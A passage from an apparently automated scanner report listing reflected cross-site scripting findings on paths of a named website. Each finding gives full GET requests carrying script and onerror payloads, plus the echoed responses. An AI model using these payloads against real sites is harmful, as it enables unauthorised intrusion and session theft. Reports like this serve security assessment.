2.4822. http://www.resellerbase.com/travel-vaccation/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24bf1"><img%20src%3da%20onerror%3dalert(1)>a17931350f2 was submitted in the cat parameter. This input was echoed as 24bf1\"><img src=a onerror=alert(1)>a17931350f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /travel-vaccation/search.php?cat=1224bf1"><img%20src%3da%20onerror%3dalert(1)>a17931350f2&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=1224bf1\"><img src=a onerror=alert(1)>a17931350f2">
...[SNIP]...

2.4823. http://www.resellerbase.com/travel-vaccation/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70f6"><img%20src%3da%20onerror%3dalert(1)>cb82b30c8dccbea2a was submitted in the cat parameter. This input was echoed as e70f6\"><img src=a onerror=alert(1)>cb82b30c8dccbea2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /travel-vaccation/search.php?cat=12e70f6"><img%20src%3da%20onerror%3dalert(1)>cb82b30c8dccbea2a&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=12e70f6\"><img src=a onerror=alert(1)>cb82b30c8dccbea2a">
...[SNIP]...

2.4824. http://www.resellerbase.com/travel-vaccation/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 50a91<a>cced0ac3d8e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/search.php?keyword=search...50a91<a>cced0ac3d8e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...50a91<a>cced0ac3d8e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4825. http://www.resellerbase.com/travel-vaccation/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c9f8<script>alert(1)</script>fe1f52ba582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2&3c9f8<script>alert(1)</script>fe1f52ba582=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2&3c9f8<script>alert(1)</script>fe1f52ba582=1 was not found on this server.</p>
...[SNIP]...

2.4826. http://www.resellerbase.com/travel-vaccation/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d149a<a>34e970cfc52 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2d149a<a>34e970cfc52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2d149a<a>34e970cfc52 was not found on this server.</p>
...[SNIP]...

2.4827. http://www.resellerbase.com/travel-vaccation/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 551b5<script>alert(1)</script>9404917dc73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation551b5<script>alert(1)</script>9404917dc73/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation551b5<script>alert(1)</script>9404917dc73/themes/ was not found on this server.</p>
...[SNIP]...

2.4828. http://www.resellerbase.com/travel-vaccation/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6e612<script>alert(1)</script>943069223f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes6e612<script>alert(1)</script>943069223f7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes6e612<script>alert(1)</script>943069223f7/ was not found on this server.</p>
...[SNIP]...

2.4829. http://www.resellerbase.com/travel-vaccation/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab33f<script>alert(1)</script>77973c19a69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/?ab33f<script>alert(1)</script>77973c19a69=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/?ab33f<script>alert(1)</script>77973c19a69=1 was not found on this server.</p>
...[SNIP]...

2.4830. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51810<script>alert(1)</script>3fd46c68ec5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation51810<script>alert(1)</script>3fd46c68ec5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.4831. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f104<script>alert(1)</script>1425f843d31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes9f104<script>alert(1)</script>1425f843d31/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes9f104<script>alert(1)</script>1425f843d31/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4832. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f208d<script>alert(1)</script>81ad07909f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmosf208d<script>alert(1)</script>81ad07909f3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmosf208d<script>alert(1)</script>81ad07909f3/ was not found on this server.</p>
...[SNIP]...

2.4833. http://www.resellerbase.com/travel-vaccation/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4d780<script>alert(1)</script>3a399eff235 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/?4d780<script>alert(1)</script>3a399eff235=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/?4d780<script>alert(1)</script>3a399eff235=1 was not found on this server.</p>
...[SNIP]...

2.4834. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77754<script>alert(1)</script>4b4d9ffbce8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation77754<script>alert(1)</script>4b4d9ffbce8/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation77754<script>alert(1)</script>4b4d9ffbce8/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4835. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4aed4<script>alert(1)</script>e23e9541f59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes4aed4<script>alert(1)</script>e23e9541f59/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes4aed4<script>alert(1)</script>e23e9541f59/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4836. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62e50<script>alert(1)</script>202918db144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos62e50<script>alert(1)</script>202918db144/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos62e50<script>alert(1)</script>202918db144/images/ was not found on this server.</p>
...[SNIP]...

2.4837. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5b0b<script>alert(1)</script>e5c817b0fd2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/imagesb5b0b<script>alert(1)</script>e5c817b0fd2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/imagesb5b0b<script>alert(1)</script>e5c817b0fd2/ was not found on this server.</p>
...[SNIP]...

2.4838. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0219<script>alert(1)</script>fe2e419e0f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/?e0219<script>alert(1)</script>fe2e419e0f5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/?e0219<script>alert(1)</script>fe2e419e0f5=1 was not found on this server.</p>
...[SNIP]...

2.4839. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 222e9<script>alert(1)</script>1d032b679e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation222e9<script>alert(1)</script>1d032b679e7/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation222e9<script>alert(1)</script>1d032b679e7/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4840. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ebba4<script>alert(1)</script>5053b2fb4d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themesebba4<script>alert(1)</script>5053b2fb4d2/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themesebba4<script>alert(1)</script>5053b2fb4d2/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4841. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/

Issue detail

